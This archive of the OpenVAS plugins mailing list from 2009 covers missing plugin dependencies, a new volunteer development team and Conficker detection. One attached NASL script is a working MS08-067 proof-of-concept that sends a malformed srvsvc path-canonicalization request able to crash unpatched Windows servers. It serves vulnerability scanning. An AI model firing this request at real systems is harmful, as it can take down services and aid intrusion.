../scripts/samba_arbitrary_file_access.nasl depends on non-existant > smb_nativelanman.nasl > plugin ../scripts/securenet_sensor_detect.nasl depends on non-existant > macosx_version.nasl > plugin ../scripts/sendmail_header.nasl depends on non-existant > solaris26_105395.nasl > plugin ../scripts/sendmail_header.nasl depends on non-existant > solaris26_x86_105396.nasl > plugin ../scripts/sendmail_header.nasl depends on non-existant > solaris7_107684.nasl > plugin ../scripts/sendmail_header.nasl depends on non-existant > solaris7_x86_107685.nasl > plugin ../scripts/sendmail_header.nasl depends on non-existant > solaris8_110615.nasl > plugin ../scripts/sendmail_header.nasl depends on non-existant > solaris8_x86_110616.nasl > plugin ../scripts/sendmail_header.nasl depends on non-existant > solaris9_113575.nasl > plugin ../scripts/sendmail_header.nasl depends on non-existant > solaris9_x86_114137.nasl > plugin ../scripts/serendipity_xss.nasl depends on non-existant > serendipity_detect.nasl > plugin ../scripts/servletExec_DoS.nasl depends on non-existant > www_too_long_url.nasl > plugin ../scripts/sql_injection.nasl depends on non-existant webmirror.nasl > plugin ../scripts/squid_rdos.nasl depends on non-existant > redhat-RHSA-2004-591.nasl > plugin ../scripts/teso_telnet.nasl depends on non-existant > ms_telnet_overflow.nasl > plugin ../scripts/w32_spybot_worm_variant.nasl depends on non-existant > os_fingerprint.nasl > plugin ../scripts/webapp_apage_cmd_exe.nasl depends on non-existant > webapp_detect.nasl > plugin .../scripts/webcalendar_sql_injection.nasl depends on non-existant > webcalendar_detect.nasl > plugin ../scripts/ws4e_too_long_url.nasl depends on non-existant > www_too_long_url.nasl > plugin ../scripts/xoops_myheader_url_xss.nasl depends on non-existant > xoops_detect.nasl > plugin .../scripts/xoops_viewtopic_xss.nasl depends on non-existant > xoops_detect.nasl > plugin ../scripts/ypupdated_remote_exec.nasl depends on non-existant > rpc_portmap.nasl > Warning: 112 plugins that depend on NONEXISTANT plugins found. > -------------- next part -------------- > A non-text attachment was scrubbed... > Name: not available > Type: application/pgp-signature > Size: 198 bytes > Desc: not available > Url : > http://lists.wald.intevation.org/pipermail/openvas-plugins/attachments/20090330/5e8ca783/attachment-0001.pgp > > ------------------------------ > > Message: 3 > Date: Mon, 30 Mar 2009 18:10:50 +0530 > From: "Chandrashekhar B" > Subject: Re: [Openvas-plugins] New plugin development team > To: 'Goran Li?ina' , > > Message-ID: <55D893D00BE943C4BE1C6A8EDF7ABE25 at bchandra> > Content-Type: text/plain; charset="iso-8859-2" > > > Thanks for offering to help! We had started on this exercise of reworking > the missing Plugins and completed some of them. As of now, the following > Plugins are missing, > > apcnisd_detect.nasl > cisco_ids_manager_detect.nasl > e107_detect.nasl > invision_power_board_detect.nasl > ms_telnet_overflow.nasl > msrpc_dcom2.nasl > openca_html_injection.nasl > os_fingerprint.nasl > phorum_detect.nasl > php_nuke_installed.nasl > phpmyfaq_detect.nasl > postnuke_detect.nasl > rsync_modules.nasl > serendipity_detect.nasl > snmp_sysDesc.nasl > sybase_detect.nasl > sybase_easerver_detect.nasl > webcalendar_detect.nasl > webmirror.nasl > www_too_long_url.nasl > xoops_detect.nasl > yahoo_msg_running.nasl > > You could take some of these for development. The way to go about would be, > check the Plugins that are depending on the above and analyze what they > expect. In general, some missing KB item setting has to be done in the way > the dependent Plugins expect. > > Thanks, > Chandra. > > ________________________________________ > From: openvas-plugins-bounces at wald.intevation.org > [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Goran > Licina > Sent: Monday, March 30, 2009 2:43 PM > To: Openvas-plugins at wald.intevation.org > Subject: [Openvas-plugins] New plugin development team > > Hi, > > in agreement with Mr. Jan-Oliver Wagner and Mr. Vlatko Kosturjak we gathered > a team for developing new OpenVAS plugins. Since we would like to start with > writing plugins as soon as possible, Mr. Wagner suggested that we could for > a start develop missing plugins that cause other OpenVAS plugins not to work > properly. > > So, can You please tell us on which plugin(s) we can start working on and > what is the common procedure to do that? > > Best regards, > > Goran Licina > -- > Laboratory for Systems and Signals > Department of Electronic Systems and Information Processing > Faculty of Electrical Engineering and Computing > University of Zagreb > > > > > ------------------------------ > > _______________________________________________ > Openvas-plugins mailing list > Openvas-plugins at wald.intevation.org > http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins > > > End of Openvas-plugins Digest, Vol 16, Issue 10 > *********************************************** From mime at gmx.de Mon Mar 30 15:07:13 2009 From: mime at gmx.de (Michael Meyer) Date: Mon, 30 Mar 2009 15:07:13 +0200 Subject: [Openvas-plugins] Plugins dependencies In-Reply-To: <659770.91777.qm@web28612.mail.ukl.yahoo.com> References: <659770.91777.qm@web28612.mail.ukl.yahoo.com> Message-ID: <20090330130713.GA4366@m2.homelinux.org> Hello Christian, *** Christian Eric EDJENGUELE wrote: > Hello, > I think the right name in script_dependencies is remote-detect-sybase-easerver.nasl > Cheers. > > > sybase_detect.nasl > > sybase_easerver_detect.nasl Hmmm... mime at kira:/opt/openvas-2.0.1/lib/openvas/plugins % grep remote-detect-sybase-easerver.nasl *.nasl | wc -l 0 mime at kira:/opt/openvas-2.0.1/lib/openvas/plugins % grep sybase_easerver_detect.nasl *.nasl | wc -l 2 Micha From christian.edjenguele at owasp.org Mon Mar 30 20:48:05 2009 From: christian.edjenguele at owasp.org (Christian Eric Edjenguele) Date: Mon, 30 Mar 2009 20:48:05 +0200 Subject: [Openvas-plugins] Plugins dependencies In-Reply-To: <20090330130713.GA4366@m2.homelinux.org> References: <659770.91777.qm@web28612.mail.ukl.yahoo.com> <20090330130713.GA4366@m2.homelinux.org> Message-ID: <49D113E5.4080608@owasp.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi Michael: chrix at darkstar:~/Workspaces/OpenVAS/trunk/openvas-plugins/scripts$ ls . | grep remote-detect-sybase remote-detect-sybase-easerver-mgmt.nasl remote-detect-sybase-easerver.nasl you are looking for remote-detect-sybase-easerver.nasl in script code! as I said the name in the code is wrong the right script name is in "remote-detect-sybase-easerver.nasl" you can find it in the script directory as you can see. I've just made the fix. Cheers. Michael Meyer wrote: > Hello Christian, > > *** Christian Eric EDJENGUELE wrote: >> Hello, >> I think the right name in script_dependencies is remote-detect-sybase-easerver.nasl >> Cheers. >> >>> sybase_detect.nasl >>> sybase_easerver_detect.nasl > > Hmmm... > > mime at kira:/opt/openvas-2.0.1/lib/openvas/plugins % grep remote-detect-sybase-easerver.nasl *.nasl | wc -l > 0 > > mime at kira:/opt/openvas-2.0.1/lib/openvas/plugins % grep sybase_easerver_detect.nasl *.nasl | wc -l > 2 > > Micha > _______________________________________________ > Openvas-plugins mailing list > Openvas-plugins at wald.intevation.org > http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins - -- Christian Eric Edjenguele IT Security Software Engineer / IT Enterprise Software Architect Mobile (IT): +39 3408580513 PGP KeyID: 0xB1654498 Key Server: http://pgp.mit.edu - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.9 (GNU/Linux) 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 E1MQObpE5A== =7VGF - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJJ0RPfAAoJENETScWxZUSYOo8H/jPi5vtBHiiJm6P6PN1jT9v1 bFdFhyrz8FkDafPDCDijTwBvNMsbq5B+X6490+IQLC44hn6r1M1BDwJ3t3ELgV8u JstthkyGmvZeS3GkJQeppGRJAQ39wCcvHmctx2D2rA64/eoOxN9jmDmI+Lz5KTn/ aQl8y8ATyoizQOSiJ2hU90cG+WPYDKOV36yYtsrGKDtzHMEx8bJ48mVLASgrK0ni 2injGj7JtljalHmdpBJjFNEqM9XMfQlfGX76X3CX7xtZjKvynqdfycsT/l2c+3jg NisCZgYww5gZZzPZAC52lYtTmZeTdr7iF1fMw3J1PZ/T00nbkELgVJeHnoDMOHo= =SP0S -----END PGP SIGNATURE----- From bchandra at secpod.com Tue Mar 31 14:06:42 2009 From: bchandra at secpod.com (Chandrashekhar B) Date: Tue, 31 Mar 2009 17:36:42 +0530 Subject: [Openvas-plugins] Conficker worm detection - OpenVAS plugins Message-ID: Conficker worm variants A, B and C are dependent on vulnerability in Microsoft server service. Microsoft had released an advisory MS08-067 back in October 2008 to address the above vulnerability. As was expected at that time, number of attacks are spreading, major one being Conficker worm. We have plugins for OpenVAS, 900055 - secpod_ms08-067_900055.nasl 900056 - secpod_ms08-067_900056.nasl to detect patch condition of MS08-067. The plugin 900055 requires SMB credentials and verifies if the required hotfix is installed through Windows Registry and verifying the updated file versions. The plugin 900056 is a Proof of Concept exploit that tries to crash the server service (safe_checks has to be disabled). This can work on anonymous login credentials if the target system allows anonymous login (Windows 2000 by default allows anonymous login). The plugin checks the RPC response status of an un-patched system. Thanks, Chandra. From timb at nth-dimension.org.uk Tue Mar 31 22:46:18 2009 From: timb at nth-dimension.org.uk (Tim Brown) Date: Tue, 31 Mar 2009 21:46:18 +0100 Subject: [Openvas-plugins] Conficker worm detection - OpenVAS plugins In-Reply-To: References: Message-ID: <200903312146.19680.timb@nth-dimension.org.uk> On Tuesday 31 March 2009 13:06:42 Chandrashekhar B wrote: *snip* > to detect patch condition of MS08-067. The plugin 900055 requires SMB > credentials and verifies if the required hotfix is installed through > Windows Registry and verifying the updated file versions. The plugin 900056 > is a Proof of Concept exploit that tries to crash the server service > (safe_checks has to be disabled). This can work on anonymous login > credentials if the target system allows anonymous login (Windows 2000 by > default allows anonymous login). The plugin checks the RPC response status > of an un-patched system. This is all true but it doesn't really go far enough since it only looks for the original vulnerability and not Conficker. I started working on a check for Conficker last night and got someway before I noticed a glaring problem but nothing which at this stage is complete. I've attached the plugin in rough form here if anyone wants to take it up. The problems I've had so far is the lack of support for non-clear text authentication in the OpenVAS SMB implementation which is limiting my ability to test here, as I only have 2003/Vista systems to play with. I've diverted to start working on that and will be sending another email shortly to openvas-devel regarding this. Cheers, Tim -- Tim Brown -------------- next part -------------- ############################################################################# # Based on the work of Tim Brown as published # here, http://www.nth-dimension.org.uk/blog.php?id=72 along with the # associated NASL from SecPod ############################################################################ if(description) { script_id(900056); script_dependencies("secpod_reg_enum.nasl"); exit(0); } include("smb_nt.inc"); if(safe_checks()){ exit(0); } name = kb_smb_name(); login = kb_smb_login(); pass = kb_smb_password(); domain = kb_smb_domain(); port = kb_smb_transport(); soc = open_sock_tcp(port); if(!soc){ exit(0); } if(!domain) domain = ""; if(!login) login = ""; if(!pass) pass = ""; r = smb_session_request(soc:soc, remote:name); if(!r) { close(soc); exit(0); } prot = smb_neg_prot(soc:soc); if(!prot){ close(soc); exit(0); } r = smb_session_setup(soc:soc, login:login, password:pass, domain:domain, prot:prot); if(!r) { close(soc); report = string("MS08-067: Failed to perform Clear Text based authentication."); security_note(data:report, port:port); exit(0); } uid = session_extract_uid(reply:r); if(!uid) { close(soc); exit(0); } r = smb_tconx(soc:soc, uid:uid, share:"IPC$", name:name); if(!r) { close(soc); exit(0); } tid = tconx_extract_tid(reply:r); if(!tid) { close(soc); exit(0); } tid_high = tid / 256; tid_low = tid % 256; uid_high = uid / 256; uid_low = uid % 256; # \srvsvc Request req = raw_string(0xff, 0x53, 0x4d, 0x42, 0xa2, 0x00, 0x00, 0x00, 0x00, 0x08, 0x01, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xa2, 0x4d, uid_low, uid_high, 0x0b, 0x00, 0x18, 0xff, 0x00, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9f, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x5c, 0x00, 0x73, 0x00, 0x72, 0x00, 0x76, 0x00, 0x73, 0x00, 0x76, 0x00, 0x63, 0x00, 0x00, 0x00); req = raw_string(0x00, 0x00, 0x00, (strlen(req)%256)) + req; send(socket:soc, data:req); resp = smb_recv(socket:soc, length:4096); if(strlen(resp) < 107) { close(soc); exit(0); } fid_low = ord(resp[42]); fid_high = ord(resp[43]); # srvsvc Bind Request req = raw_string(0xff, 0x53, 0x4d, 0x42, 0x25, 0x00, 0x00, 0x00, 0x00, 0x08, 0x01, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xa2, 0x4d, uid_low, uid_high, 0x0c, 0x00, 0x10, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x52, 0x00, 0x48, 0x00, 0x52, 0x00, 0x02, 0x00, 0x26, 0x00, fid_low, fid_high, 0x57, 0x00, 0x00, 0x5c, 0x00, 0x50, 0x00, 0x49, 0x00, 0x50, 0x00, 0x45, 0x00, 0x5c, 0x00, 0x00, 0x00, 0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0xb8, 0x10, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0xc8, 0x4f, 0x32, 0x4b, 0x70, 0x16, 0xd3, 0x01, 0x12, 0x78, 0x5a, 0x47, 0xbf, 0x6e, 0xe1, 0x88, 0x03, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00); req = raw_string(0x00, 0x00, 0x00, (strlen(req)%256)) + req; send(socket:soc, data:req); smb_recv(socket:soc, length:4096); # ntrPathCanonicalize Request (With Malicious Code) req = raw_string( 0xff, 0x53, 0x4d, 0x42, 0x25, 0x00, 0x00, 0x00, 0x00, 0x08, 0x01, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0x00, 0x28, uid_low, uid_high, 0x0d, 0x00, 0x10, 0x00, 0x00, 0x7c, 0x00, 0x00, 0x00, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x52, 0x00, 0x7c, 0x00, 0x52, 0x00, 0x02, 0x00, 0x26, 0x00, fid_low, fid_high, 0x83, 0x04, 0x00, 0x5c, 0x00, 0x50, 0x00, 0x49, 0x00, 0x50, 0x00, 0x45, 0x00, 0x5c, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 0x7c, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00, 0x02, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x31, 0x00, 0x39, 0x00, 0x32, 0x00, 0x2E, 0x00, 0x31, 0x00, 0x36, 0x00, 0x38, 0x00, 0x2e, 0x00, 0x31, 0x00, 0x35, 0x00, 0x33, 0x00, 0x2e, 0x00, 0x31, 0x00, 0x32, 0x00, 0x39, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x2e, 0x00, 0x2e, 0x00, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x27, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00); req = raw_string(0x00, 0x00, 0x00, 0xce) + req; send(socket:soc, data:req); resp = smb_recv(socket:soc, length:1024); fwrite(file:"/tmp/bah", data:resp); close(soc); exit(0); From goran.licina at lss.hr Tue Mar 31 15:21:31 2009 From: goran.licina at lss.hr (Goran Licina) Date: Tue, 31 Mar 2009 15:21:31 +0200 Subject: [Openvas-plugins] New plugin development team References: <8A02A3DF683DEE42BE73187F4CA4444C04CA58@vlasta.lss-net.lss.hr> <55D893D00BE943C4BE1C6A8EDF7ABE25@bchandra> Message-ID: <8A02A3DF683DEE42BE73187F4CA4444C0394CD@vlasta.lss-net.lss.hr> Thank you for your suggestions. We will check these plugins and let you know on which plugins we will start working. Best regards, Goran Licina -----Original Message----- From: openvas-plugins-bounces at wald.intevation.org on behalf of Chandrashekhar B Sent: Mon 3/30/2009 2:40 PM To: Goran Licina; Openvas-plugins at wald.intevation.org Subject: Re: [Openvas-plugins] New plugin development team Thanks for offering to help! We had started on this exercise of reworking the missing Plugins and completed some of them. As of now, the following Plugins are missing, apcnisd_detect.nasl cisco_ids_manager_detect.nasl e107_detect.nasl invision_power_board_detect.nasl ms_telnet_overflow.nasl msrpc_dcom2.nasl openca_html_injection.nasl os_fingerprint.nasl phorum_detect.nasl php_nuke_installed.nasl phpmyfaq_detect.nasl postnuke_detect.nasl rsync_modules.nasl serendipity_detect.nasl snmp_sysDesc.nasl sybase_detect.nasl sybase_easerver_detect.nasl webcalendar_detect.nasl webmirror.nasl www_too_long_url.nasl xoops_detect.nasl yahoo_msg_running.nasl You could take some of these for development. The way to go about would be, check the Plugins that are depending on the above and analyze what they expect. In general, some missing KB item setting has to be done in the way the dependent Plugins expect. Thanks, Chandra. ________________________________________ From: openvas-plugins-bounces at wald.intevation.org [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Goran Licina Sent: Monday, March 30, 2009 2:43 PM To: Openvas-plugins at wald.intevation.org Subject: [Openvas-plugins] New plugin development team Hi, in agreement with Mr. Jan-Oliver Wagner and Mr. Vlatko Kosturjak we gathered a team for developing new OpenVAS plugins. Since we would like to start with writing plugins as soon as possible, Mr. Wagner suggested that we could for a start develop missing plugins that cause other OpenVAS plugins not to work properly. So, can You please tell us on which plugin(s) we can start working on and what is the common procedure to do that? Best regards, Goran Licina -- Laboratory for Systems and Signals Department of Electronic Systems and Information Processing Faculty of Electrical Engineering and Computing University of Zagreb _______________________________________________ Openvas-plugins mailing list Openvas-plugins at wald.intevation.org http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.wald.intevation.org/pipermail/openvas-plugins/attachments/20090331/f1f31acb/attachment.htm